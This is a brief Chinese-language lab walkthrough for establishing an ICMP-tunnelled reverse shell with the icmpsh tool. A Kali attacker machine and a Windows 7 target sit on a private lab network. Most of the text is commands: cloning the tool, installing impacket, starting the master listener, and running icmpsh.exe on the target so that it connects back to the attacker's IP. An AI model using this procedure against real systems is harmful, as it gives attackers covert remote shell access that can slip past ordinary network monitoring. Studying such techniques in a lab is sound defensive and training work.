Kali:192.168.61.145
Win7:192.168.61.128
Kali上先下载icmpsh
git clone https://github.com/inquisb/icmpsh.git
安装python-impacket
apt-get install python-impacket
关闭Kali系统自己的ping回复(实验完成后,记得设回0)
然后进入icmpsh文件夹内执行
# python icmpsh_m.py [攻击机IP][目标IP]
python icmpsh_m.py 192.168.61.145 192.168.61.128
然后在目标机器上运行
# icmpsh.exe -t [攻击机IP]
icmpsh.exe -t 192.168.61.145
成功建立了会话
最后记得开启系统的ping回复